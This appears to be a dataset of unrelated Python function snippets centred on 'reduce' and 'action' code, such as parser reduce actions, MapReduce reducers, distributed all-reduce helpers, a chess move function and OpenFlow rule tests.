"def optimize_actions(actions):\n result = {}\n\n def donothing(oid, index_oid, action1, action2):\n del result[(oid, index_oid)]\n\n def doadd(oid, index_oid, action1, action2):\n result[(oid, index_oid)] = action1\n\n def dochange(oid, index_oid, action1, action2):\n result[(oid, index_oid)] = ReindexAction(\n action2.index, action2.mode, oid,\n )\n\n def dodefault(oid, index_oid, action1, action2):\n result[(oid, index_oid)] = action2\n\n statefuncs = {\n # txn asked to remove an object that previously it was\n # asked to add, conclusion is to do nothing\n (IndexAction, UnindexAction):donothing,\n # txn asked to change an object that was not previously added,\n # concusion is to just do the add\n (IndexAction, ReindexAction):doadd,\n # txn action asked to remove an object then readd the same\n # object. We translate this to a single change action.\n (UnindexAction, IndexAction):dochange,\n }\n\n for newaction in actions:\n oid = newaction.oid\n index_oid = newaction.index_oid\n oldaction = result.get((oid, index_oid))\n statefunc = statefuncs.get(\n (oldaction.__class__, newaction.__class__),\n dodefault,\n )\n statefunc(oid, index_oid, oldaction, newaction)\n\n result = list(sorted(result.values()))\n return result",
"def _get_reduction(self):\n if (not self._allow_sum_over_batch_size and\n distribute_lib.has_strategy() and\n (self.reduction == losses_utils.ReductionV2.AUTO or\n self.reduction == losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE)):\n raise ValueError(\n 'Please use `tf.keras.losses.Reduction.SUM` or '\n '`tf.keras.losses.Reduction.NONE` for loss reduction when losses are '\n 'used with `tf.distribute.Strategy` outside of the built-in training '\n 'loops. You can implement '\n '`tf.keras.losses.Reduction.SUM_OVER_BATCH_SIZE` using global batch '\n 'size like:\\n```\\nwith strategy.scope():\\n'\n ' loss_obj = tf.keras.losses.CategoricalCrossentropy('\n 'reduction=tf.keras.losses.Reduction.NONE)\\n....\\n'\n ' loss = tf.reduce_sum(loss_obj(labels, predictions)) * '\n '(1. / global_batch_size)\\n```\\nPlease see '\n 'https://www.tensorflow.org/tutorials/distribute/custom_training'\n ' for more details.')\n\n if self.reduction == losses_utils.ReductionV2.AUTO:\n return losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE\n return self.reduction",
"def _call_reduce_action(self, context, subresults):\n debug = self.debug\n result = None\n bt_result = None\n production = context.production\n\n if self.build_tree:\n # call action for building tree node if enabled.\n if debug:\n h_print(\"Building non-terminal node\",\n \"'{}'.\".format(production.symbol.name), level=2)\n\n bt_result = treebuild_reduce_action(context, nodes=subresults)\n if not self.call_actions_during_tree_build:\n return bt_result\n\n sem_action = production.symbol.action\n if sem_action:\n assignments = production.assignments\n if assignments:\n assgn_results = {}\n for a in assignments.values():\n if a.op == '=':\n assgn_results[a.name] = subresults[a.index]\n else:\n assgn_results[a.name] = bool(subresults[a.index])\n\n if type(sem_action) is list:\n if assignments:\n result = sem_action[production.prod_symbol_id](\n context, subresults, **assgn_results)\n else:\n result = sem_action[production.prod_symbol_id](context,\n subresults)\n else:\n if assignments:\n result = sem_action(context, subresults, **assgn_results)\n else:\n result = sem_action(context, subresults)\n\n else:\n if debug:\n h_print(\"No action defined\",\n \" for '{}'.\".format(production.symbol.name), level=1)\n if len(subresults) == 1:\n if debug:\n h_print(\"Unpacking a single subresult.\", level=1)\n result = subresults[0]\n else:\n if debug:\n h_print(\"Result is a list of subresults.\", level=1)\n result = subresults\n\n if debug:\n h_print(\"Action result =\",\n \"type:{} value:{}\"\n .format(type(result), repr(result)), level=1)\n\n # If build_tree is set to True, discard the result of the semantic\n # action, and return the result of treebuild_reduce_action.\n return bt_result if bt_result is not None else result",
"def action_map(self) -> Dict[str, CLIActionType]:\n return add_dicts({\n \"dump\": self.dump_action,\n \"dump-macrosizes\": self.dump_macrosizes_action,\n \"dump_macrosizes\": self.dump_macrosizes_action,\n \"synthesis\": self.synthesis_action,\n \"syn\": self.synthesis_action,\n \"par\": self.par_action,\n \"synthesis_to_par\": self.synthesis_to_par_action,\n \"synthesis-to-par\": self.synthesis_to_par_action,\n \"syn_to_par\": self.synthesis_to_par_action,\n \"syn-to-par\": self.synthesis_to_par_action,\n \"synthesis_par\": self.synthesis_par_action,\n \"synthesis-par\": self.synthesis_par_action,\n \"syn_par\": self.synthesis_par_action,\n \"syn-par\": self.synthesis_par_action,\n \"hier_par_to_syn\": self.hier_par_to_syn_action,\n \"hier-par-to-syn\": self.hier_par_to_syn_action,\n \"par_to_drc\": self.par_to_drc_action,\n \"par-to-drc\": self.par_to_drc_action,\n \"par_to_lvs\": self.par_to_lvs_action,\n \"par-to-lvs\": self.par_to_lvs_action,\n \"drc\": self.drc_action,\n \"lvs\": self.lvs_action\n }, self.all_hierarchical_actions)",
"def reducer(token_pair):\n\treturn (token_pair[0], sum(token_pair[1]))",
"def reducer(state: State, action: Action) -> State:\n state = copy.deepcopy(state)\n if isinstance(state, dict):\n state = forest.state.State.from_dict(state)\n if isinstance(action, dict):\n try:\n action = forest.actions.Action.from_dict(action)\n except TypeError:\n return state.to_dict()\n\n if action.kind == SET_FIGURES:\n state.layers.figures = action.payload\n\n elif action.kind == ON_ADD:\n state.layers.mode.state = \"add\"\n\n elif action.kind == ON_CLOSE:\n row_index = action.payload\n try:\n layer_index = sorted(state.layers.index.keys())[row_index]\n del state.layers.index[layer_index]\n except IndexError:\n pass\n\n elif action.kind == ON_EDIT:\n row_index = action.payload\n layer_index = sorted(state.layers.index.keys())[row_index]\n state.layers.mode.state = \"edit\"\n state.layers.mode.index = layer_index\n\n elif action.kind == SAVE_LAYER:\n # NOTE: Layer index is stored in payload\n layer_index = action.payload[\"index\"]\n settings = action.payload[\"settings\"]\n if layer_index in state.layers.index:\n state.layers.index[layer_index].update(settings)\n else:\n state.layers.index[layer_index] = settings\n\n elif action.kind == SET_ACTIVE:\n active = action.payload[\"active\"]\n row_index = action.payload[\"row_index\"]\n row_to_layer = sorted(state.layers.index.keys())\n try:\n layer_index = row_to_layer[row_index]\n state.layers.index[layer_index][\"active\"] = active\n except IndexError:\n pass\n\n return state.to_dict()",
"def reduce_run():",
"def __reduce__(\n self: TokenMatcher,\n ) -> Tuple[Any, Any]: # Precisely typing this would be really long.\n data = (\n self.__class__,\n self.vocab,\n self._patterns,\n self._callbacks,\n self.defaults,\n )\n return (unpickle_matcher, data)",
"def reveal(self, dst=None):\n op = torch.distributed.ReduceOp.BXOR\n if dst is None:\n return comm.get().all_reduce(self.share, op=op)\n else:\n return comm.get().reduce(self.share, dst, op=op)",
"def reduce_tree(self, handle_actions, terminal_converter=None):\r\n def handle_node(node):\r\n \"\"\"\r\n Return the result representing the node, using recursion.\r\n\r\n Call the appropriate `handle_action` for this node. As its inputs,\r\n feed it the output of `handle_node` for each child node.\r\n \"\"\"\r\n if not isinstance(node, ParseResults):\r\n # Then treat it as a terminal node.\r\n if terminal_converter is None:\r\n return node\r\n else:\r\n return terminal_converter(node)\r\n\r\n node_name = node.getName()\r\n if node_name not in handle_actions: # pragma: no cover\r\n raise Exception(u\"Unknown branch name '{}'\".format(node_name))\r\n\r\n action = handle_actions[node_name]\r\n handled_kids = [handle_node(k) for k in node]\r\n return action(handled_kids)\r\n\r\n # Find the value of the entire tree.\r\n return handle_node(self.tree)",
"def reducer2():\n\n riders = 0 # The number of total riders for this key\n num_hours = 0 # The number of hours with this key\n old_key = None\n\n for line in sys.stdin:\n data = line.strip().split('\\t')\n\n if len(data) != 2:\n continue\n\n new_key, count = data\n\n if old_key and old_key != new_key:\n print('{}\\t{}'.format(old_key, riders / num_hours))\n riders = 0\n num_hours = 0\n\n riders += float(count)\n num_hours += 1\n old_key = new_key\n\n if old_key is not None:\n print('{}\\t{}'.format(old_key, riders / num_hours))",
"def applyDemapping(self):\n pass",
"def reduceDegenerate(self,target=None):\n from elements import elementType\n if not hasattr(self,'eltype'):\n return [ self ]\n\n eltype = elementType(self.eltype)\n if not hasattr(eltype,'degenerate'):\n return [ self ]\n\n # get all reductions for this eltype\n strategies = eltype.degenerate\n\n # if target, keep only those leading to target\n if target is not None:\n s = strategies.get(target,[])\n if s:\n strategies = {target:s}\n else:\n strategies = {}\n\n if not strategies:\n return [self]\n\n\n e = self\n ML = []\n\n for totype in strategies:\n\n elems = []\n for conditions,selector in strategies[totype]:\n cond = array(conditions)\n w = (e[:,cond[:,0]] == e[:,cond[:,1]]).all(axis=1)\n sel = where(w)[0]\n if len(sel) > 0:\n elems.append(e[sel][:,selector])\n # remove the reduced elems from m\n e = e[~w]\n\n if e.nelems() == 0:\n break\n\n if elems:\n elems = concatenate(elems)\n ML.append(Connectivity(elems,eltype=totype))\n\n if e.nelems() == 0:\n break\n\n ML.append(e)\n\n return ML",
"def _dad_reduce_all_gather(self, act_tensor, grad_tensor, *args, **kw):\n act_gathered = [_torch.zeros_like(act_tensor) for _ in range(_dist.get_world_size())]\n grad_gathered = [_torch.zeros_like(grad_tensor) for _ in range(_dist.get_world_size())]\n\n _dist.all_gather(act_gathered, act_tensor)\n _dist.all_gather(grad_gathered, grad_tensor)\n\n act_gathered = _torch.cat(act_gathered)\n grad_gathered = _torch.cat(grad_gathered)\n\n return act_gathered, grad_gathered",
"def _call(self, k_spec):\n if \"reducer_type\" not in k_spec.keys():\n raise ValueError(\"Did not specify the type of the global descriptor reducer.\")\n if k_spec[\"reducer_type\"] == \"average\":\n return Atomic_2_Global_Average(k_spec)\n if k_spec[\"reducer_type\"] == \"sum\":\n return Atomic_2_Global_Sum(k_spec)\n if k_spec[\"reducer_type\"] == \"moment_average\":\n return Atomic_2_Global_Moment_Average(k_spec)\n if k_spec[\"reducer_type\"] == \"moment_sum\":\n return Atomic_2_Global_Moment_Sum(k_spec)\n else:\n raise NotImplementedError",
"def _dad_reduce_gather_broadcast(self, act_tensor, grad_tensor, dest=0, *args, **kw):\n act_gathered = [_torch.zeros_like(act_tensor) for _ in range(_dist.get_world_size())]\n grad_gathered = [_torch.zeros_like(grad_tensor) for _ in range(_dist.get_world_size())]\n\n \"\"\"Compression here\"\"\"\n _dist.gather(act_tensor, act_gathered if _dist.get_rank() == dest else None, dst=dest)\n _dist.gather(grad_tensor, grad_gathered if _dist.get_rank() == dest else None, dst=dest)\n\n act_gathered = _torch.cat(act_gathered)\n grad_gathered = _torch.cat(grad_gathered)\n\n _dist.broadcast(act_gathered, src=dest)\n _dist.broadcast(grad_gathered, src=dest)\n \"\"\"Decompression here\"\"\"\n\n return act_gathered, grad_gathered",
"def _successor(self, state: S, action: Action, *args, **kwargs) -> D:\n pass",
"def decodeSRaction(tree):\n # Start decoding\n post_nodelist = postorder_DFT(tree, [])\n # print len(post_nodelist)\n actionlist = []\n for node in post_nodelist:\n if (node.lnode is None) and (node.rnode is None):\n actionlist.append(('Shift', None, None))\n elif (node.lnode is not None) and (node.rnode is not None):\n form = node.form\n if (form == 'NN') or (form == 'NS'):\n relation = extractrelation(node.rnode.relation)\n else:\n relation = extractrelation(node.lnode.relation)\n actionlist.append(('Reduce', form, relation))\n else:\n raise ValueError(\"Can not decode Shift-Reduce action\")\n return actionlist",
"def reducer(functions, init_value):\n return reduce(lambda res, func: func(res), functions, init_value)",
"def pure2mixed(num_actions, action):\n mixed_action = np.zeros(num_actions)\n mixed_action[action] = 1\n return mixed_action",
"def _dediscretize_action(self, action):\n\n if self.discrete_input:\n\n discrete_m1 = action[0]\n discrete_m2 = action[1]\n\n\n m1 = 145 + discrete_m1 * 99/(self.num_div_action - 1)\n m2 = 145 + discrete_m2 * 99/(self.num_div_action - 1)\n\n else:\n if self.differential_car:\n # actions fron 0 to 24\n discrete_m1 = action//5\n discrete_m2 = action % 5\n\n m1 = 145 + discrete_m1 * 99/(self.num_div_action - 1)\n m2 = 145 + discrete_m2 * 99/(self.num_div_action - 1)\n\n else:\n discrete_m1 = action // 5\n discrete_m2 = action % 5\n\n # the traction engine of the ackerman car starts\n # working with pwm=180\n\n m1 = 180 + discrete_m1 * 74 / (self.num_div_action - 1)\n\n # it is the servo and goes from 0 to 255\n m2 = discrete_m2 * 255 / (self.num_div_action - 1)\n\n return m1, m2",
"def __call__(self):\n return self.reduce()",
"def local_cut_useless_reduce(node):\r\n if isinstance(node.op, T.CAReduce):\r\n summed, = node.inputs\r\n # if reduce were doing anything, the output ndim would be reduced\r\n if summed.type == node.outputs[0].type:\r\n return [summed]",
"def __reduce__(self):\r\n return (self.__class__, (self.func, self.cachedir, self.ignore,\r\n self.mmap_mode, self.compress, self._verbose))",
"def _merge_and_reduce(self, signals):\n\n if self.s_filter:\n\n signals = clean(signals,\n standardize=self.standardize,\n low_pass=self.low_pass,\n high_pass=self.high_pass,\n t_r=self.tr)\n \n return signals",
"def all_reduce(self):\n return {k: reduce_number(v) for k, v in self.items()}",
"def test_action_independence_multiple(self):\n DST1, DST2 = ('SET_FIELD', ('IPV4_DST', 0x1)), ('SET_FIELD', ('IPV4_DST', 0x2))\n SRC1, SRC2 = ('SET_FIELD', ('IPV4_SRC', 0x1)), ('SET_FIELD', ('IPV4_SRC', 0x2))\n OUT1, OUT2 = ('OUTPUT', 1), ('OUTPUT', 2)\n n1 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x0, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DST1, SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=0)\n ], match_redundancy=True)\n \"\"\"\n dst:1, src:2 -> output:1, dst:2, src:1, output:2\n dst:0/31 -> dst:1, src:2, output:1, dst:2, src:1, output:2\n \"\"\"\n n2 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 1, None),\n ('IPV4_SRC', 2, None)]),\n instructions=inst_from_acts([OUT1, DST2, SRC1, OUT2])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x0, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DST1, SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=0)\n ], match_redundancy=True)\n \"\"\"\n dst:1 -> src:2, output:1, dst:2, src:1, output:2\n dst:0/31 -> dst:1, src:2, output:1, dst:2, src:1, output:2\n \"\"\"\n n3 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 1, None)]),\n instructions=inst_from_acts([SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x0, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DST1, SRC2, OUT1, DST2, SRC1, OUT2])),\n Rule(priority=0)\n ], match_redundancy=True)\n\n self.assertTrue(check_equal(n1, n2))\n self.assertTrue(check_equal(n2, n3))\n self.assertTrue(check_equal(n1, n3))",
"def _rewrite_unary_default(self, node: saldag.UnaryOpNode):\n parent = next(iter(node.parents))\n if parent.is_mpc:\n # if node is leaf stop\n if node.is_leaf():\n node.is_mpc = True\n return\n # node is not leaf\n if isinstance(parent, saldag.Concat) and parent.is_boundary():\n push_op_node_down(parent, node)\n elif isinstance(parent, saldag.Aggregate) and self._do_commute(parent, node):\n agg_op = parent\n agg_parent = agg_op.parent\n if isinstance(agg_parent, saldag.Concat) and agg_parent.is_boundary():\n concat_op = agg_parent\n assert len(concat_op.children) == 1\n push_op_node_down(agg_op, node)\n updated_node = agg_op.parent\n push_op_node_down(concat_op, updated_node)\n else:\n node.is_mpc = True\n else:\n node.is_mpc = True\n else:\n pass",
"def test_was_produced_by_action(self):\n\n test_content = {\n AbstractAction.ACTION: WordExtraction.__name__,\n AbstractAction.RESULT: ['One', 'Two']\n }\n\n assert WordExtraction.produced(test_content)\n\n test_content[AbstractAction.ACTION] = ''\n\n assert not WordExtraction.produced(test_content)",
"def reducer(key, vals):\n count = 0\n for p in vals:\n count += 1\n mr.emit((key, count))",
"def resolve_conflicts(actions):\n\n # organize actions by discriminators\n unique = {}\n output = []\n for i, action in enumerate(actions):\n if not isinstance(action, dict):\n # old-style tuple action\n action = expand_action(*action)\n\n # \"order\" is an integer grouping. Actions in a lower order will be\n # executed before actions in a higher order. Within an order,\n # actions are executed sequentially based on original action ordering\n # (\"i\").\n order = action['order'] or 0\n discriminator = action['discriminator']\n\n # \"ainfo\" is a tuple of (order, i, action) where \"order\" is a\n # user-supplied grouping, \"i\" is an integer expressing the relative\n # position of this action in the action list being resolved, and\n # \"action\" is an action dictionary. The purpose of an ainfo is to\n # associate an \"order\" and an \"i\" with a particular action; \"order\"\n # and \"i\" exist for sorting purposes after conflict resolution.\n ainfo = (order, i, action)\n\n if discriminator is None:\n # The discriminator is None, so this action can never conflict.\n # We can add it directly to the result.\n output.append(ainfo)\n continue\n\n L = unique.setdefault(discriminator, []) # noqa\n L.append(ainfo)\n\n # Check for conflicts\n conflicts = {}\n\n for discriminator, ainfos in unique.items():\n\n # We use (order, i) as a sort key because we need to\n def byorder(ainfo):\n order, i = ainfo[0], ainfo[1]\n return order, i\n\n ainfos.sort(key=byorder)\n ainfo, rest = ainfos[0], ainfos[1:]\n output.append(ainfo)\n _, _, action = ainfo\n order = action['order']\n discriminator = action['discriminator']\n base_module_name = action['module_name']\n base_order = action['order']\n\n for _, _, action in rest:\n if action['order'] <= base_order:\n L = conflicts.setdefault(discriminator, [base_module_name, base_order]) # noqa\n L.append((action['module_name'], action['order']))\n\n if conflicts:\n raise ConfigurationConflictError(conflicts)\n\n # Sort conflict-resolved actions by (order, i) and return them.\n return [x[2] for x in sorted(output, key=operator.itemgetter(0, 1))]",
"def __reduce__(self):\n return (self.__class__, (self.getstate(),), self.__dict__)",
"def apply(self):",
"def get_deconz_actions_mapping(self) -> Optional[TypeActionsMapping]:\n return None",
"def __init__(self, reduce_func=np.mean, ndir=100, seed=None):\n self.__reduce_func = reduce_func\n self.__directions = None\n self.__seed = seed\n self.__ndir = ndir",
"def test_action_independence_single(self):\n SF1, OUT = ('SET_FIELD', ('IPV4_DST', 0x01010101)), ('OUTPUT', 6)\n DEC_TTL = ('DEC_NW_TTL', None)\n # 0.1.1.0/30 -> ip:1.1.1.1, output:1\n n1 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([SF1, OUT])),\n Rule(priority=0)\n ])\n # 1.1.1.1/32 -> output:1\n # 1.1.1.0/31 -> ip:1.1.1.1, output:1\n n2 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010101, None)]),\n instructions=inst_from_acts([OUT])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([SF1, OUT])),\n Rule(priority=0)\n ])\n # 1.1.1.0/32 -> ip:1.1.1.1, output1\n # 1.1.1.0/31 -> output:1\n n3 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010100, None)]),\n instructions=inst_from_acts([SF1, OUT])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([OUT])),\n Rule(priority=0)\n ])\n n4 = normalise([\n Rule(priority=10,\n match=Match([('IPV4_DST', 0x01010101, None)]),\n instructions=inst_from_acts([OUT])),\n Rule(priority=9,\n match=Match([('IPV4_DST', 0x01010100, 0xFFFFFFFE)]),\n instructions=inst_from_acts([DEC_TTL, SF1, OUT])),\n Rule(priority=0)\n ])\n self.assertTrue(check_equal(n1, n2))\n self.assertFalse(check_equal(n1, n4))\n self.assertTrue(check_equal(n2, n3))\n self.assertTrue(check_equal(n1, n3))",
"def duplicate_transition_ignore(old_transition, new_transition):\n return old_transition",
"def reduce(self, f, initial):\n self.append(Reducer(f, initial))\n return self",
"def make_accumulator():\n pass # replace with your solution",
"def apply(self) -> None:",
"def apply(self) -> None:",
"def on_sense_sonar(self, dist):\n raise NotImplementedError()",
"def make_rules(self, old_rules):\n rules = defaultdict(set)\n\n def recurse_disc_rule(attr, rule):\n \"\"\"\n Recursively partition multivalued discrete attributes if\n its worth it\n \"\"\"\n\n\n ro = RuleObj(rule,\n self.bad_err_funcs,\n self.good_err_funcs,\n self.bad_tables,\n self.good_tables)\n\n if not self.prune_rule(ro):\n return set([ro])\n \n c = rule.filter.conditions[0]\n var_type = rule.data.domain[c.position].var_type\n\n if (var_type == Orange.feature.Type.Discrete):\n if len(c.values) == 1:\n return [ro]\n \n refiner = BeamRefiner(attrs=[attr], fanout=10)\n ret = set()\n for _, newrule in refiner(rule):\n ret.update(recurse_disc_rule(attr, newrule))\n return ret\n else:\n if len(rule.data) < self.min_pts:\n return [ro]\n return [ro]\n\n # XXX: figure out this logic!\n\n refiner = BeamRefiner(attrs=[attr], fanout=2)\n ret = set()\n for _, newrule in refiner(rule):\n newro = RuleObj(newrule,\n self.bad_err_funcs,\n self.good_err_funcs,\n self.bad_tables,\n self.good_tables)\n ret.update(recurse_disc_rule(attr, newrule))\n\n \n if old_rules is None:\n base_rule = SDRule(self.full_table, None) \n refiner = BeamRefiner(attrs=self.cols, fanout=10)\n #refiner = BeamRefiner(attrs=['recipient_nm'], fanout=30) \n\n \n for attr, rule in refiner(base_rule):\n ros = recurse_disc_rule(attr, rule)\n #self.top_k({None:ros})\n ros = filter(self.prune_rule, ros)\n rules[(attr,)].update(ros)\n\n else:\n attrs = old_rules.keys()\n for a_idx, attr1 in enumerate(attrs):\n for attr2 in attrs[a_idx+1:]:\n merged_attrs = set(attr1).union(attr2)\n max_attrs_len = max(len(attr1), len(attr2))\n if len(merged_attrs) == max_attrs_len:\n continue\n \n \n a1rules, a2rules = old_rules[attr1], old_rules[attr2]\n\n for ro in self.merge_dims(a1rules, a2rules):\n key = ro.rule.attributes\n\n #self.top_k({None:(ro,)})\n if self.prune_rule(ro):\n rules[key].add(ro)\n \n return rules",
"def make_reducer_task_conf(self, taskid):\n return {\n 'jobid': self.id,\n 'taskid': taskid,\n 'reducer': self.reducer,\n 'output_dir': self.output_dir,\n 'inputs': [map_output(self.id, i, taskid) for i in \\\n range(self.cnt_mappers)]\n }",
"def apply(self):\n pass",
"def apply(self):\n pass",
"def __init__(self, reduce=True, one_side=False):\n self.reduce = reduce\n self.one_side = one_side",
"def computeActionFromValues(self, state):\n\n ##util.raiseNotDefined()\n #\"*** YOUR CODE STARTS HERE ***\"\n \n # Code to remove --- from here\n resultingAction = None\n if self.mdp.isTerminal(state):\n return resultingAction\n else:\n bestq = float(\"-inf\")\n actions = self.mdp.getPossibleActions(state)\n for action in actions:\n qvalue = self.computeQValueFromValues(state, action)\n if qvalue > bestq:\n bestq = qvalue\n resultingAction = action\n return resultingAction\n\n # Code to remove --- to here\n #\"*** YOUR CODE FINISHES HERE ***\"",
"def result(state, action):\n # Faster than deepcopy\n new_state = pickle.loads(pickle.dumps((state)))\n\n if action.castle == None:\n # Attacking En passant pawn\n if new_state.en_passant == action.end:\n new_state.board[action.start] = cc.NO_PIECE\n new_state.board[action.end] = action.piece\n # Delete black pawn\n if new_state.en_passant[0] == cc.RANK_6:\n down = (action.end[0]+1, action.end[1])\n new_state.board[down] = cc.NO_PIECE\n # Delete white pawn\n elif new_state.en_passant[0] == cc.RANK_3:\n up = (action.end[0]-1, action.end[1])\n new_state.board[up] = cc.NO_PIECE\n # Default Case\n else:\n # Delete piece from the start\n new_state.board[action.start] = \" \"\n # Place piece at the end\n new_state.board[action.end] = action.piece\n\n # Set en_passant space for a pawn moving 2\n if action.en_p:\n new_state.en_passant = cc.coord_to_alg(action.en_p)\n else:\n new_state.en_passant = cc.NO_C_EP\n\n # Remove castle availability if the rook or king move\n if action.piece == cc.W_ROOK:\n if action.start == (cc.RANK_1, cc.FILE_H):\n new_state.castles_avail = new_state.castles_avail.replace('K', '')\n elif action.start == (cc.RANK_1, cc.FILE_A):\n new_state.castles_avail = new_state.castles_avail.replace('Q', '')\n elif action.piece == cc.W_KING:\n if action.start == (cc.RANK_1, cc.FILE_E):\n new_state.castles_avail = new_state.castles_avail.replace('K', '')\n new_state.castles_avail = new_state.castles_avail.replace('Q', '')\n elif action.piece == cc.B_ROOK:\n if action.start == (cc.RANK_8, cc.FILE_H):\n new_state.castles_avail = new_state.castles_avail.replace('k', '')\n elif action.start == (cc.RANK_8, cc.FILE_A):\n new_state.castles_avail = new_state.castles_avail.replace('q', '')\n elif action.piece == cc.B_KING:\n if action.start == (cc.RANK_8, cc.FILE_E):\n new_state.castles_avail = new_state.castles_avail.replace('k', '')\n new_state.castles_avail = new_state.castles_avail.replace('q', '')\n\n # Update the halfmove count\n if action.capture or action.piece == cc.W_PAWN or action.piece == cc.B_PAWN:\n new_state.halfmove = 0\n else:\n new_state.halfmove += 1\n \n else: # Castle Time\n if action.castle == cc.CASTLE_QUEENSIDE:\n if state.active_color == cc.WHITE_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_1, cc.FILE_A] = \" \"\n new_state.board[cc.RANK_1, cc.FILE_D] = cc.W_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_1, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_1, cc.FILE_C] = cc.W_KING\n # Remove all White castling availability\n new_state.castles_avail = new_state.castles_avail.replace('K','')\n new_state.castles_avail = new_state.castles_avail.replace('Q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n elif state.active_color == cc.BLACK_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_8, cc.FILE_A] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_D] = cc.B_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_8, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_C] = cc.B_KING\n # Remove all Black castling availability\n new_state.castles_avail = new_state.castles_avail.replace('k','')\n new_state.castles_avail = new_state.castles_avail.replace('q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n\n elif action.castle == cc.CASTLE_KINGSIDE:\n if state.active_color == cc.WHITE_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_1, cc.FILE_H] = \" \"\n 
new_state.board[cc.RANK_1, cc.FILE_F] = cc.W_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_1, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_1, cc.FILE_G] = cc.W_KING\n # Remove all White castling availability\n new_state.castles_avail = new_state.castles_avail.replace('K','')\n new_state.castles_avail = new_state.castles_avail.replace('Q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n elif state.active_color == cc.BLACK_ACTIVE:\n # Delete and Place Rook\n new_state.board[cc.RANK_8, cc.FILE_H] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_F] = cc.B_ROOK\n # Delete and Place King\n new_state.board[cc.RANK_8, cc.FILE_E] = \" \"\n new_state.board[cc.RANK_8, cc.FILE_G] = cc.B_KING\n # Remove all Black castling availability\n new_state.castles_avail = new_state.castles_avail.replace('k','')\n new_state.castles_avail = new_state.castles_avail.replace('q','')\n # If the string is empty, replace with a dash\n if not new_state.castles_avail:\n new_state.castles_avail = cc.NO_C_EP\n \n # Update fullmove count\n if new_state.active_color == cc.WHITE_ACTIVE:\n new_state.active_color = cc.BLACK_ACTIVE\n new_state.opp_color = cc.WHITE_ACTIVE\n else:\n new_state.active_color = cc.WHITE_ACTIVE\n new_state.opp_color = cc.BLACK_ACTIVE\n new_state.fullmove += 1\n\n new_state.active_king = new_state.find_king(new_state.active_color)\n new_state.inactive_king = new_state.find_king(new_state.opp_color)\n\n return new_state",
"def dj_reduce(self,tol=1.e-13):\n djs = self._dj_reducible_stages(tol=tol)\n if len(djs)>0:\n for stage in djs[::-1]:\n self._remove_stage(stage)\n return self",
"def _reduce(self) -> None:\n divisor = self._gcd(self._numerator, self._denominator)\n self._numerator = self._numerator // divisor\n self._denominator = self._denominator // divisor",
"def _visit(self, node, pre_action=None, post_action=None):\n self.color[node] = \"GREY\"\n self.distance[node] = 0\n self.parent[node] = None\n Q = Queue()\n Q.put(node) # node is GREY\n if pre_action: # when Q.put\n pre_action(node)\n while not Q.empty():\n source = Q.get()\n for edge in self.graph.iteroutedges(source):\n if self.color[edge.target] == \"WHITE\":\n self.color[edge.target] = \"GREY\"\n self.distance[edge.target] = self.distance[source] + 1\n self.parent[edge.target] = source\n self.dag.add_edge(edge)\n Q.put(edge.target) # target is GREY\n if pre_action: # when Q.put\n pre_action(edge.target)\n self.color[source] = \"BLACK\"\n if post_action: # source became BLACK\n post_action(source)",
"def overall_reduction(self):\n return 84",
"def _reduce_rep(self):\n for k, v in self.items():\n if not k:\n self[k] = 0\n for per1, per2 in pairwise(k):\n if per1 == per2:\n self[k] = 0\n super()._reduce_rep()",
"def transition(self, action: Action) -> D:\n if self.debug: print(f\"StateNode.transition({action.name})\")\n if self._transitions:\n if self._transitions[action]:\n if callable(self._transitions[action]):\n result = self._transitions[action](source=self, action=action)\n if action and not action.result: action.result = result\n return result\n else:\n result = self._transitions[action]\n if action and not action.result: action.result = result\n return result\n elif action and action.result:\n return action.result\n elif action and action.transform:\n return self._successor(action.transform(source=self, action=action), action)\n else:\n raise KeyError(action)",
"def __rshift__(self, other):\n if isinstance(other, self.accepted_plugs):\n self.connect(other)",
"def compact(self, distance=2):\n pass",
